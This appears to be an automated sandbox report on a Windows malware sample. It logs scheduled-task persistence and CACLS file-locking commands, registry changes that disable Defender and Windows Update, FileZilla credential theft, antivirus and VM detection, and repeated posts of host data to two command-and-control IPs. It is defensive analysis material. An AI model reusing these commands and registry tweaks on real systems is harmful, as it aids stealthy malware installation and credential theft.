cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (2 events)

host	77.91.68.63
host	83.97.73.131

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService June 26, 2023, 9:52 a.m.	service_handle: 0x008dceb0 service_name: WinDefend control_code: 1		0	0
ControlService June 26, 2023, 9:52 a.m.	service_handle: 0x008dd3d8 service_name: wuauserv control_code: 1		0	0

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW June 26, 2023, 9:53 a.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (12 events)

Time & API	Arguments	Status	Return
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA June 26, 2023, 9:53 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\200f691d32" /P "test22:N"
cmdline	CACLS "..\200f691d32" /P "test22:R" /E
cmdline	CACLS "rugen.exe" /P "test22:N"
cmdline	cmd /k echo Y\|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y\|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
cmdline	CACLS "rugen.exe" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y\|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

fotod95.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All